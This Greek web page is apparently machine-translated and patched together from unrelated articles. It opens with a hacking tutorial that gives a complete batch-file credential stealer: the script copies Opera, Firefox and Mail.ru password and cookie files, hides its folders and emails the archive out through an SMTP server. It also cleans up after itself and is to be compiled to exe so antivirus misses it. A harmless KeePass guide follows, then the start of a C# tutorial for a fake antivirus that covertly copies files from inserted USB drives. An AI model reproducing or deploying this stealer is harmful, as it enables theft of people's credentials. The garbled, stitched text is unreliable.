Σε αυτό το άρθρο θα περιγράψω πόσο γρήγορα και χωρίς ιδιαίτερη δυσκολία, γράψτε και φτιάξτε έναν ιό που κλέβει αρχεία με κωδικούς πρόσβασης και τα στέλνει όλα στο γραμματοκιβώτιο.
Ας ξεκινήσουμε με το γεγονός ότι ο ιός θα γραφτεί στο bat "e (CMD, μπορείτε να πάρετε τις βασικές εντολές) δηλαδή στα συνηθισμένα αρχείο κειμένουκαι θα εκτελεστεί χρησιμοποιώντας τον τυπικό, ενσωματωμένο διερμηνέα των Windows - "γραμμή εντολών".
Για να γράψετε έναν τέτοιο ιό, πρέπει να γνωρίζετε την ακριβή θέση αποθήκευσης αυτών των αρχείων που θα κλέψει, στοιχεία Blat που μπορούν να ληφθούν από τον ιστότοπο εκτός http://www.blat.net/ ή από τον διακομιστή μας, όπως καθώς και ένα στοιχείο από το αρχείο αρχειοθέτησης WinRaR Rar.exe (μπορείτε να το κάνετε χωρίς αυτό).
Ανοίξτε το σημειωματάριο και αντιγράψτε τον ακόλουθο κώδικα σε αυτό:

@echo off md %systemroot%\wincs md %SystemDrive%\pass\ md %SystemDrive%\pass\opera\ md %SystemDrive%\pass\Mozilla\ md %SystemDrive%\pass\MailAgent\ md %SystemDrive%\pass MailAgent\reg attrib %systemroot%\wincs +h +s +r attrib %SystemDrive%\pass +h +s +r copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" αντιγραφή /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" αντίγραφο /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" CD /D % APPDATA%\Opera\Opera\ copy /y wand.dat %SystemDrive%\pass\opera\wand.dat αντίγραφο /y cookies4.dat %SystemDrive%\pass\opera\cookies4.da regedit.exe -ea %SystemDrive%\ pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru magent_logins3 CD /D %APPDATA% Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul Xcopy Mra\Update\ver.txt %SystemDrive%\pass\ MailAgent /K /H /G /Q /R /S /Y >nul cd %AppData%\Mozill a\Firefox\Profiles\*.default\ copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite αντίγραφο /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul del /s /q %SystemRoot%\Rar.exe %SystemDrive%\pass\ rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\ copy /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar cd %systemroot%\wincs %systemroot %\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Κωδικός πρόσβασης ren *.rar pass.rar %systemroot%\wincs\blat.exe -body FilesPassword -to [email protected] -επισύναψη %systemroot%\wincs\pass.rar rmdir /s /q %SystemDrive%\pass rmdir /s /q %systemroot%\wincs del /s /q %systemroot%\blat. exe del /s /q %systemroot%\blat.dll del /s /q %systemroot%\blat.lib attrib +a +s +h +r %systemroot%\wind.exe EXIT cls

Δεν θα γράψω πολλά από τον κώδικα του ίδιου του Batinka.
@echo off - κρύβει το σώμα του πισνού (άρα δεν χρειάζεται, αλλά ακόμα)
md %systemroot%\wincs - δημιουργεί έναν φάκελο wincs στο σύστημα φάκελο των Windowsδεν έχει σημασία σε ποια μονάδα είναι εγκατεστημένη ή πώς λέγεται.
md %SystemDrive%\pass\ - δημιουργεί έναν φάκελο πρόσβασης στη μονάδα δίσκου όπου είναι εγκατεστημένα τα Windows.
md %SystemDrive%\pass\opera\ - δημιουργεί το φάκελο opera από όπου το wand.dat και τα cookies4.dat Πρόγραμμα περιήγησης Opera(έως και 11* εκδόσεις, η opera αποθηκεύει τους κωδικούς πρόσβασης στο αρχείο wand.dat)
md %SystemDrive%\pass\Mozilla\- δημιουργεί έναν φάκελο Mozilla από τον οποίο προέρχονται τα αρχεία Το πρόγραμμα περιήγησης Mozilla(cookies.sqlite ,key3.db ,signons.sqlite ) στα οποία αποθηκεύονται οι κωδικοί πρόσβασης.
md %SystemDrive%\pass\MailAgent\- δημιουργεί έναν φάκελο MailAgent στον οποίο θα αντιγραφούν αρχεία που περιέχουν το ιστορικό της αλληλογραφίας και τα κλειδιά μητρώου (αποθήκευση κωδικών πρόσβασης) από το Mail Agent.
md %SystemDrive%\pass\MailAgent\reg- δημιουργεί ένα φάκελο reg
Attrib %systemroot%\wincs +h +s +r- τοποθετεί χαρακτηριστικά στο φάκελο wincs, αποκρύπτοντάς τον έτσι από την προβολή.
Attrib %SystemDrive%\pass +h +s +r- το ίδιο με το παραπάνω.
αντιγραφή /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe"- αντιγράφει το αρχείο blat.exe από τη θέση λήψης στο φάκελο wincs
copy /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll"- αντιγράφει το αρχείο blat.dll από τη θέση λήψης στον φάκελο wincs
copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib"- αντιγράφει το αρχείο blat.lib από τη θέση λήψης στο φάκελο wincs
CD /D %APPDATA%\Opera\Opera\ - πηγαίνει στο φάκελο opera όπου βρίσκονται αρχεία με κωδικούς πρόσβασης (και όχι μόνο) από την opera.
αντιγραφή /y wand.dat %SystemDrive%\pass\opera\wand.dat- αντιγράφει το αρχείο wand.dat στο φάκελο opera
αντιγραφή /y cookies4.dat %SystemDrive%\pass\opera\cookies4.dat- αντιγράφει το αρχείο cookie4.dat στον φάκελο opera
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2- εξάγει το κλειδί μητρώου magent_logins2 όπου είναι αποθηκευμένος ο κωδικός πρόσβασης στον φάκελο reg
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3- εξάγει το κλειδί μητρώου magent_logins3 όπου είναι αποθηκευμένος ο κωδικός πρόσβασης στον φάκελο reg
CD / D %APPDATA% - μεταβείτε στο φάκελο AppData
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul- αντιγράφει τα περιεχόμενα του φακέλου Mra\Base στο φάκελο MailAgent
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul- αντιγράφει το αρχείο ver.txt στο φάκελο MailAgent
cd %AppData%\Mozilla\Firefox\Profiles\*.default\- μεταβείτε στο φάκελο με το προφίλ του προγράμματος περιήγησης Mozilla
copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite- αντιγράφει το αρχείο cookies.sqlite στο φάκελο Mozilla
αντιγραφή /y key3.db %SystemDrive%\pass\Mozilla\key3.db- αντιγράφει το αρχείο key3.db στο φάκελο Mozilla
αντιγραφή /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite- αντιγράφει το αρχείο signons.sqlite στο φάκελο Mozilla
αντιγραφή /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul- αντιγράφει το στοιχείο αρχειοθέτησης WinRar Rar.exe στο φάκελο pass
del /s /q %SystemRoot%\Rar.exe- αφαιρεί το στοιχείο αρχειοθέτησης από το φάκελο των Windows
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\- αρχειοθετήστε τα περιεχόμενα του φακέλου pass
αντιγραφή /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rarαντιγράψτε το αρχείο που δημιουργήθηκε στον φάκελο wincs
cd %systemroot%\wincs - μεταβείτε στο φάκελο wincs
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Κωδικός πρόσβασης - προετοιμάζει το πρόγραμμα Blat για να στείλει το αρχείο καθορίζοντας τα δεδομένα για εξουσιοδότηση και στέλνοντας την επιστολή. Μην ξεχάσετε να καθορίσετε τα δεδομένα σας από το γραμματοκιβώτιο από το οποίο θα είναι η επιστολή με το αρχείο Απεσταλμένα.
ren *.rar pass.rar - σε περίπτωση που το αρχείο δεν πήρε λάθος όνομα κατά τη διάρκεια της διαδικασίας, θα το μετονομάσουμε ξανά σε pass.rar
%systemroot%\wincs\blat.exe -body Files Κωδικός πρόσβασης -to [email protected] -επισύναψη %systemroot%\wincs\pass.rar- υποδείξτε σε ποια ταχυδρομική διεύθυνση θα σταλεί η επιστολή και στείλτε την.
rmdir /s /q %SystemDrive%\pass- διαγράψτε το φάκελο pass
rmdir /s /q %systemroot%\wincs- διαγράψτε το φάκελο wincs
del /s /q %systemroot%\blat.exe
del /s /q %systemroot%\blat.dll- αφαιρέστε τα στοιχεία Blat από το φάκελο των Windows.
del /s /q %systemroot%\blat.lib- αφαιρέστε τα στοιχεία Blat από το φάκελο των Windows.
attrib +a +s +h +r %systemroot%\wind.exe- βάζουμε χαρακτηριστικά στον εαυτό μας, κρύβοντας έτσι τον εαυτό μας από τα μάτια.
EXIT - ολοκληρώστε τη διαδικασία batink και βγείτε.
cls - διαγράψτε την έξοδο οποιωνδήποτε γραμμών στον intraperator.
Αντιγράφηκε, αποθηκεύστε ως wind.bat και μεταγλωττίστε στο exe χρησιμοποιώντας Προγράμματα νυχτερίδωνσε μετατροπέα exe, τότε συλλέγουμε τα πάντα μαζί, δηλαδή παίρνουμε τα στοιχεία του προγράμματος Blat και το στοιχείο αρχειοθέτησης WinRar (μπορείτε να το κατεβάσετε) και το κολλάμε σε ένα εκτελέσιμο αρχείο ή με κάποιο πρόγραμμα, η διαδρομή για την εκφόρτωση όλων των αρχείων πρέπει be% SystemRoot% ή% WindowsDir % ή %windir% .
Ως αποτέλεσμα, λαμβάνουμε έναν ιό που δεν θα πυροδοτηθεί από τα προγράμματα προστασίας από ιούς και θα στείλει ένα αρχείο με αρχεία στην αλληλογραφία σας. Τα αρχεία που έρχονται στο ταχυδρομείο μπορούν να αποκρυπτογραφηθούν χρησιμοποιώντας ανάκτηση πολλαπλών κωδικών πρόσβασης, αν και όχι όλα, αλλά μόνο με ραβδί .dat από την όπερα και, στη συνέχεια, αν δεν ενημερώθηκε σε εκδόσεις 11 *. Όλα τα άλλα αρχεία μπορούν να αποκρυπτογραφηθούν αντικαθιστώντας τα με τα δικά σας.
Νομίζω ότι αυτό είναι το τέλος, αν έχετε οποιεσδήποτε ερωτήσεις μη διστάσετε να ρωτήσετε.
Σας ευχαριστώ για την προσοχή σας, ό,τι καλύτερο!
©Swap TheHackWorld.in

Πολλές εταιρείες, συμπεριλαμβανομένης της Sony και της Adobe, έχουν ήδη πέσει θύματα χάκερ που έχουν κλέψει εκατομμύρια κωδικούς πρόσβασης και άλλα δεδομένα χρηστών. Η ανάλυση αυτών των πληροφοριών έδειξε ότι πολλοί χρήστες χρησιμοποιούν συχνά είτε αδύναμους κωδικούς πρόσβασης όπως "123456" ή τον ίδιο κωδικό πρόσβασης για πολλές υπηρεσίες. Αυτό διευκολύνει πολύ το έργο τους για τους χάκερ, και ταυτόχρονα, μια τέτοια απροσεξία μπορεί να γίνει κατανοητή: ποιος είναι σε θέση να θυμάται περισσότερους από δώδεκα σύνθετους κωδικούς πρόσβασης;

Μια απλή λύση θα μπορούσε να είναι ένα κομμάτι χαρτί κολλημένο κάτω από το πληκτρολόγιο. Κανένας χάκερ δεν θα μπορέσει να το καταπατήσει, αλλά θα πρέπει να παρακολουθείτε συνεχώς άτομα που βρίσκονται κοντά στον υπολογιστή σας. Και αυτό το φύλλο δεν είναι χρήσιμο εάν θέλετε να συνδεθείτε στον λογαριασμό σας από τον υπολογιστή κάποιου άλλου.

Το δωρεάν εργαλείο KeePass 2 Portable λύνει αυτό το δίλημμα. Για τη λειτουργία του χρειάζεστε μόνο μια μονάδα flash USB με 10 MB ελεύθερου χώρου, στην οποία θα εγκαταστήσετε ένα βοηθητικό πρόγραμμα. Στο μέλλον, θα χρειαστεί να θυμάστε μόνο έναν κωδικό πρόσβασης - από την προστατευμένη περιοχή της μονάδας flash. Εξάλλου, σε αυτό το KeePass αποθηκεύει τα δεδομένα σύνδεσης στις υπηρεσίες web σας με τη μορφή μιας κωδικοποιημένης τράπεζας δεδομένων, που προστατεύεται από έναν κύριο κωδικό πρόσβασης.

Οι Trojans που κλέβουν κωδικούς πρόσβασης δεν θα μπορούν να μυρίσουν τίποτα. Και επειδή δεν χρειάζεται πλέον να θυμάστε δεκάδες κωδικούς πρόσβασης, μπορείτε πραγματικά να χρησιμοποιήσετε έναν νέο για κάθε υπηρεσία web. ισχυρό κωδικό πρόσβασης. Τώρα θα σας πούμε λεπτομερώς πώς να χρησιμοποιήσετε το KeePass.

Πως να το κάνεις

1 Εγκαταστήστε ένα χρηματοκιβώτιο κωδικού πρόσβασης


Εγκαταστήστε ένα χρηματοκιβώτιο κωδικού πρόσβασης

Τοποθετήστε μια μονάδα flash USB στον υπολογιστή, δημιουργήστε έναν νέο φάκελο σε αυτόν και αντιγράψτε τα περιεχόμενα του αρχείου με το λογισμικό KeePass εκεί. Εκτελέστε το πρόγραμμα KeePass.exe. Μετά την εκκίνηση, ενεργοποιήστε αυτόματη αναζήτησηενημερώσεις κάνοντας κλικ στο "Ενεργοποίηση" στο αναδυόμενο παράθυρο. Στη συνέχεια, επιλέξτε "Προβολή | Αλλαγή γλώσσας" και κάντε κλικ στο "Λήψη περισσότερων γλωσσών".

Κατεβάστε το αρχείο της ρωσικής γλώσσας από τον ιστότοπο που ανοίγει κάνοντας κλικ στο "Ρωσικά | 2,25+". Εξαγάγετε τα περιεχόμενα του αρχείου σε μια μονάδα USB. Κάντε ξανά κλικ στο "Προβολή | Αλλαγή γλώσσας», επιλέξτε «Ρωσικά» και επανεκκινήστε το KeePass πατώντας το κουμπί «Ναι».

2 Δημιουργήστε μια νέα βάση δεδομένων κωδικών πρόσβασης


Δημιουργήστε μια νέα βάση δεδομένων κωδικών πρόσβασης

Επιλέξτε "Αρχείο | Νέο" και καθορίστε τη μονάδα USB ως αποθήκευση κωδικού πρόσβασης. Στο επόμενο παράθυρο, το πρόγραμμα θα σας ζητήσει να ορίσετε τον κύριο κωδικό πρόσβασης. Θα πρέπει να το εισάγετε κάθε φορά που ξεκινάτε το KeePass.

3 Ενεργοποίηση Προστατευμένης λειτουργίας


Ενεργοποίηση προστατευμένης λειτουργίας

Για να αποτρέψετε τον Trojan να διαβάσει τον κωδικό πρόσβασής σας για το KeePass, θα πρέπει να χρησιμοποιήσετε την προστατευμένη λειτουργία του προγράμματος για να τον εισαγάγετε, παρόμοια με το UAC στα Windows 7. Για να το κάνετε αυτό, στο KeePass, μεταβείτε στα «Εργαλεία | Ρυθμίσεις | Ασφάλεια", μετακινηθείτε στο κάτω μέρος του παραθύρου και επιλέξτε το πλαίσιο δίπλα στο "Εισαγωγή κύριου κωδικού πρόσβασης σε ασφαλή λειτουργία".

4 Συμπληρώστε τη βάση δεδομένων με κωδικούς πρόσβασης


Συμπληρώστε τη βάση δεδομένων με κωδικούς πρόσβασης

Το KeePass μπορεί να ταξινομήσει τους κωδικούς πρόσβασης σε ομάδες. Από προεπιλογή, η νέα τράπεζα κωδικών πρόσβασης έχει ομάδες όπως "OS" ή "Internet". Για να δημιουργήσω νέο ρεκόρ, επιλέξτε την κατάλληλη ομάδα (ή δημιουργήστε μια νέα), κάντε δεξί κλικ στη λευκή περιοχή στα δεξιά και μετά κάντε κλικ στο «Προσθήκη καταχώρισης».

Συμπληρώστε όλα τα πεδία και κάντε κλικ στο OK. Εφόσον δεν χρειάζεται πλέον να θυμάστε κωδικούς πρόσβασης για να συνδεθείτε σε κάθε λογαριασμό, μπορείτε να ορίσετε νέους, πιο σύνθετους που μπορούν να δημιουργηθούν, για παράδειγμα, στο passwort-generator.com.

5 Χρησιμοποιήστε αυτόματη εξουσιοδότηση


Εάν θέλετε να συνδεθείτε στην υπηρεσία χρησιμοποιώντας το KeePass, ανοίξτε την ομάδα όπου είναι αποθηκευμένος ο αντίστοιχος κωδικός πρόσβασης. Κάντε δεξί κλικκλικ του ποντικιού στην αντίστοιχη καταχώρηση αποθήκευσης Κωδικοί πρόσβασης KeePassκαι επιλέξτε "Έναρξη αυτόματης κλήσης" από την αναπτυσσόμενη λίστα. Μετά από αυτό, το πρόγραμμα θα μεταφέρει τα δεδομένα σας στο πρόγραμμα περιήγησης και το πρόγραμμα περιήγησης θα ανοίξει ένα νέο παράθυρο όπου θα συνδεθείτε στον λογαριασμό σας.

Λάβετε υπόψη ότι στο πεδίο "URL" πρέπει να εισαγάγετε τη διεύθυνση URL που συνήθως εισάγετε στο πρόγραμμα περιήγησης για εξουσιοδότηση, διαφορετικά η αυτόματη εισαγωγή κωδικού πρόσβασης μέσω του KeePass δεν θα λειτουργήσει.

6 Επέκταση του KeePass


Επέκταση του KeePass

Εάν θέλετε να επεκτείνετε τη λειτουργικότητα του KeePass, μεταβείτε στα "Εργαλεία | Ενότητες | Περισσότερες ενότητες», μετά την οποία θα ανακατευθυνθείτε στον ιστότοπο με χρήσιμες επεκτάσεις(Οι συστάσεις μας βρίσκονται στον παραπάνω πίνακα). Τώρα, κάνοντας κλικ στο όνομα του πρόσθετου, κατεβάστε το και εξαγάγετε το σε μια μονάδα flash.

Επανεκκινήστε το KeePass και μεταβείτε στα Εργαλεία | Ενότητες. Μια λίστα με τα διαθέσιμα πρόσθετα θα εμφανιστεί στο κάτω μέρος (μερικά από αυτά μπορούν να διαμορφωθούν).

Οι καλύτερες επεκτάσεις για το KeePass

Εξοπλίστε το χρηματοκιβώτιο σας με κωδικούς πρόσβασης Επιπρόσθετα χαρακτηριστικά, για παράδειγμα τη συνάρτηση Κρατήστε αντίγραφοή μετάδοση κωδικού πρόσβασης για κινητά τηλέφωνα.

Ονομα

Περιγραφή

Backup της βάσης δεδομένων Ορίζει την προστασία τράπεζας κωδικών πρόσβασης σε περίπτωση κλοπής ή απώλειας της μονάδας USB.
Twofish Cipher
KeeAgent Προσθέτει έναν αλγόριθμο κωδικοποίησης που είναι σχεδόν αδύνατο να σπάσει. Σημειώστε ότι αυτό θα κάνει το KeePass να λειτουργεί πιο αργά.
KeyExchanger Προσθέτει έναν αλγόριθμο κωδικοποίησης που είναι σχεδόν αδύνατο να σπάσει. Σημειώστε ότι αυτό θα κάνει το KeePass να λειτουργεί πιο αργά.
KeeForm Ανοίγει τους αγαπημένους σας ιστότοπους με το πάτημα ενός κουμπιού και συμπληρώνει αυτόματα τα στοιχεία σύνδεσής σας.

Για τους απλούς θνητούς, μια μονάδα flash είναι μια συσκευή για τη μεταφορά εγγράφων / ταινιών / φωτογραφιών και άλλων προσωπικών (και μερικές φορές πολύ προσωπικών) πληροφοριών. Αλλά για τους χάκερ, μια μονάδα flash είναι ταυτόχρονα θύμα και εργαλείο μάχης. Σήμερα θα σας πω όλες τις περιπλοκές της ανεπαίσθητης αποστράγγισης δεδομένων από μονάδες flash στον υπολογιστή μου και θα σας διδάξω επίσης πώς να μετατρέψετε τις αβλαβείς μονάδες flash σε προγράμματα για τη δημιουργία αντιγράφων ασφαλείας κωδικών πρόσβασης από έναν "μεγάλο" υπολογιστή.

Παγίδα για τις μονάδες flash άλλων ανθρώπων

Η ιδέα του προγράμματος "Evil Computer" θα είναι η εξής. Θα αναπτύξουμε ένα μικρό εργαλείο που θα προσποιείται ότι είναι ένα υπερ-μέγα προηγμένο antivirus, σκοπός του οποίου είναι η ποιοτική αφαίρεση «επικίνδυνων» ιών από μονάδες flash. Δεν θα εκπλήξετε κανέναν με μια μονάδα flash που έχει μολυνθεί από ιούς, επομένως το εξειδικευμένο "anti-virus" μας δεν θα προκαλέσει ανησυχία σε έναν αφελή χρήστη. Αντίθετα, εισάγοντας μια μονάδα flash USB στον υπολογιστή σας και δείτε ένα μήνυμα όπως: «Εντοπίστηκε ιός. Κάνω μια λεπτομερή σάρωση όλων των αρχείων για την παρουσία μολυσμένων ", - σίγουρα θα περιμένει την ολοκλήρωση αυτής της λειτουργίας.

Προετοιμασία οργάνου

γράψε έτσι χρήσιμο πρόγραμμαθα είμαστε στο μοντέρνο πλέον C#. Η ευελιξία της γλώσσας και η πλούσια λειτουργικότητα της πλατφόρμας .NET σας επιτρέπουν να αναπτύσσετε εφαρμογές με αστραπιαία ταχύτητα. Αυτό ακριβώς χρειαζόμαστε. Μας ενδιαφέρει η συγκομιδή που μπορούμε να τρυγήσουμε, όχι η κουραστική διαδικασία κωδικοποίησης.

Ένα από τα σημαντικά στοιχεία της εφαρμογής μας θα είναι η διεπαφή. Όσο πιο σταθερά το κάνετε, τόσο πιο πιθανό είναι το θύμα να μην παρατηρήσει τη σύλληψη και να περιμένει ήρεμα την ολοκλήρωση της σάρωσης κατά των ιών. Δεν ασχολήθηκα πολύ και τοποθέτησα μόνο μια εικόνα και ένα ProgressBar στη μορφή ενός καθαρού έργου. Μπορείτε να έχετε μια έκρηξη και να κάνετε ένα εντυπωσιακό σχέδιο. Σας συμβουλεύω να δείτε τη σχεδίαση κάποιου πραγματικού antivirus και να σχεδιάσετε την εφαρμογή σας με περίπου το ίδιο στυλ.

Θέσαμε το καθήκον

Θα υποθέσουμε ότι έχουμε αποφασίσει για οργανωτικά ζητήματα και τον αλγόριθμο δράσης, ήρθε η ώρα να συζητήσουμε τις τεχνικές αποχρώσεις. Έτσι, το antivirus μας θα πρέπει να ξεκινήσει τη βρώμικη δουλειά του κατά την εγκατάσταση της μονάδας flash. Μια φορά νέος δίσκοςεμφανίζεται στο σύστημα, το πρόγραμμά μας πρέπει να καθορίσει το γράμμα του και να ξεκινήσει την αντιγραφή.

Πριν αναλάβω να γράψω αυτό το άρθρο, έπεσα πάνω στον πηγαίο κώδικα για ένα τέτοιο πρόγραμμα. Ο συγγραφέας του παραδείγματος προσδιόρισε την παρουσία μονάδας flash απαριθμώντας περιοδικά όλους τους δίσκους για την παρουσία μιας μονάδας δίσκου του τύπου " αφαιρούμενα μέσα". Στην αρχή σκέφτηκα να ακολουθήσω τον ίδιο δρόμο, αλλά μια εσωτερική φωνή υποδήλωνε παραλογισμό. Αφού ζύγισα όλα τα «υπέρ» και όλα τα «καλά, είναι ανοιχτό», απέρριψα αυτήν την ιδέα και πήγα μια βόλτα στο MSND. Πέντε λεπτά αργότερα αποδείχθηκε ότι το είχα κάνει για καλό λόγο. Η απάντηση βρέθηκε!

Χωρίς WinAPI, πουθενά…

Ο πιο αποτελεσματικός τρόπος για να μάθετε για τη σύνδεση νέου εξοπλισμού (στην περίπτωσή μας, μονάδων flash) είναι να πιάσετε και να αναλύσετε το μήνυμα WM_DEVICECHANGE. Κατά την εγκατάσταση της συσκευής, το μήνυμα αποστέλλεται σε όλα τα παράθυρα, και μπορούμε εύκολα να το επεξεργαστούμε στην εφαρμογή μας. Για να γίνει αυτό, αρκεί απλώς να περιγράψουμε τη συνάρτηση WindowProc. Στην πράξη μοιάζει με αυτό:

LResult CALLBACK WindowProc (HWND hwnd, //αναγνωριστικό παραθύρου UINT uMsg, //αναγνωριστικό μηνύματος WPARAM wParam, //συμβάν που συνέβη LPARAM lParam //δείκτης στη δομή που περιέχει δεδομένα)

Στο σώμα της συνάρτησης, πρέπει να συγκρίνετε την τιμή της παραμέτρου WParam με τα αναγνωριστικά διαφόρων συμβάντων που σχετίζονται με το μήνυμα WM_DEVICECHANGE. Για το παράδειγμά μας, αυτά θα ήταν:

  • DBT_DEVICEARRIVAL - προστέθηκε εξοπλισμός
  • DBT_DEVICEREMOVECOMPLETE - Το υλικό έχει καταργηθεί πλήρως
  • Εντάξει, ξέρουμε πώς να αποδείξουμε το γεγονός της σύνδεσης νέου εξοπλισμού, αλλά πώς να είμαστε σίγουροι ότι συνδέσατε μια μονάδα flash USB; Υπάρχουν πολλές συσκευές hot-pluggable (για usb μιλάω) (εκτυπωτής, σαρωτής, μόντεμ κ.λπ.). Ευτυχώς, αυτό το πρόβλημα λύνεται πολύ απλά. Χρησιμοποιώντας την παράμετρο LParam, μπορούμε να αναφερθούμε στη δομή _DEV_BROADCAST_HDR, η οποία έχει ένα πεδίο dbch_devicetype. Εδώ, με βάση την αξία αυτού του πεδίου, εξάγονται τα κατάλληλα συμπεράσματα. Εάν είναι ίσο με DEV_DEVTYP_VOLUME, τότε ήρθε η ώρα να χαρείτε και να χτυπήσετε τα χέρια σας - μια μονάδα flash έχει συνδεθεί σε εμάς!

    Typedef struct _DEV_BROADCAST_HDR ( DWORD dbch_size; //DWORD μέγεθος δομής dbch_devicetype; //Τύπος συσκευής DWORD dbch_reserved; //Δεσμευμένο, δεν χρησιμοποιείται )DEV_BROADCAST_HDR, *PDEV_BROADCAST_HDR, *PDEV_BROADC

    Μια μονάδα flash USB εισήχθη στο pisyuk μας - ας προσπαθήσουμε να μάθουμε το γράμμα της μονάδας που της έχει εκχωρήσει το σύστημα. Όπως και στο "Πεδίο των θαυμάτων", μπορείτε να το μαντέψετε, αλλά είναι καλύτερο να αφαιρέσετε τις πληροφορίες από τη δομή DEV_BROADCAST_VOLUME.

    Typedef struct _DEV_BROADCAST_VOLUME ( DWORD dbcv_size; //DWORD μέγεθος δομής dbcv_devicetype; //Τύπος συσκευής DWORD dbcv_reserved; //Δεσμ.

    Από όλα τα πεδία αυτής της δομής, μας ενδιαφέρει το dbcv_unitmask. Σημειώστε ότι αυτή η ιδιότητα περιέχει μόνο ένα κομμάτι του γράμματος, όχι τη συμβολική του αναπαράσταση. Για παράδειγμα, εάν η τιμή είναι 0, τότε το γράμμα μονάδας δίσκου θα είναι A. αν 1, τότε Β κ.λπ. Για τη διευκόλυνση της λήψης ενός συμβολικού γράμματος, είναι καλύτερο να γράψετε μια συνάρτηση.

    Εάν διαβάζετε τη στήλη μας εδώ και πολύ καιρό και είστε εξοικειωμένοι με τις λειτουργίες API, τότε δεν χρειάζεται να διαβάσετε το επόμενο μέρος του άρθρου. Ανοίξτε το πρόγραμμα επεξεργασίας και ξεκινήστε τη γλυπτική εφαρμογών. Έχω περιγράψει όλες τις απαραίτητες δομές και λειτουργίες. απλά πρέπει να τα βάλεις μαζί στο πρόγραμμα. Αποφασίστε, και θα αρχίσω να ασχολούμαι με το .NET και το C # συγκεκριμένα.

    Ας χτυπήσουμε .NET "Ωμ

    Ώρα να αρχίσετε να εξασκείτε και να εφαρμόσετε τις γνώσεις σας στη γλώσσα C#. "Τι στο καλό? - εσύ ρωτάς. - Μίλησα το μισό άρθρο για το WinAPI, αλλά μετά αποφάσισα ανόητα να κάνω μια κλήση σε όλες τις λειτουργίες με τη μορφή εγγενούς κώδικα; Πού είναι η ισχυριζόμενη αστραπιαία ταχύτητα ανάπτυξης;

    Σε κάτι έχεις δίκιο. Η εφαρμογή μας θα χρησιμοποιεί όντως λειτουργίες WinAPI (όχι ευκολότερος τρόπος), αλλά δεν θα τις περιγράψουμε μόνοι μας. Πολλοί προγραμματιστές αντιμετώπισαν το πρόβλημα του προσδιορισμού μονάδων flash. Ως αποτέλεσμα αυτών των αψιμαχιών, άρχισαν να εμφανίζονται δωρεάν μαθήματα για το C #, στα οποία έχουν ήδη εφαρμοστεί όλες οι απαραίτητες λειτουργίες. Απλώς πρέπει να συνδέσουμε ένα τέτοιο κενό (ανάγνωση συνιστώσα) στο έργο μας και να καλέσουμε μερικές μεθόδους. Θα χρησιμοποιήσουμε μία από αυτές τις τάξεις τώρα. Αλλά η γνώση των δομών που περιγράφονται παραπάνω θα είναι σίγουρα χρήσιμη κατά τη μεταφορά αυτού του προγράμματος στο API των Windows.

    Υπάρχουν πολλά έτοιμα μαθήματα που λύνουν τέτοια προβλήματα, αλλά μου άρεσε περισσότερο η εκδοχή του Jan Dolinay. Αυτό το άτομο έγραψε μια πολύ εύχρηστη και κατανοητή τάξη DriveDetector που μπορεί:

  • Προσδιορίστε εάν είναι συνδεδεμένη μονάδα flash
  • Καθορίστε ένα αίτημα για αποπροσάρτηση μιας συνδεδεμένης μονάδας flash
  • Προσδιορίστε το γεγονός ότι το φλας είναι απενεργοποιημένο
  • Λάβετε το γράμμα μονάδας δίσκου μιας πρόσφατα συνδεδεμένης μονάδας flash
  • Παρέχετε μια λίστα αρχείων που έχουν ανοίξει από μια μονάδα flash
  • Και το πιο σημαντικό, αυτό το μάθημα είναι εξαιρετικά εύκολο στην εργασία - θα το δείτε τώρα. Η σύνδεση μιας τάξης με το έργο σας γίνεται με τυπικό τρόπο και δεν έχει νόημα να σταθούμε σε αυτό. Ας προχωρήσουμε λοιπόν στην προετοιμασία. Γίνεται ως εξής:

    FlashDriveDetector = νέο DriveDetector(); flashDriveDetector.DeviceArrived += νέο DriveDetectorEventHandler(OnDriveArrived); flashDriveDetector.DeviceRemoved += νέο DriveDetectorEventHandler(OnDriveRemoved);

    Αφού δημιουργήσω ένα αντικείμενο της κλάσης DriveDetector, ορίζω τους χειριστές συμβάντων DevieArrived() και DriveRemoved(). Με το όνομά τους, δεν είναι δύσκολο να μαντέψει κανείς για τι ευθύνονται. Όλος ο κώδικας αρχικοποίησης γράφεται καλύτερα στη μέθοδο Form1(). Ο κύριος κωδικός του προγράμματός μας θα βρίσκεται στο πρόγραμμα χειρισμού συμβάντων DeviceArrived. Μπορείτε να δείτε το κείμενό του στην πλαϊνή γραμμή:

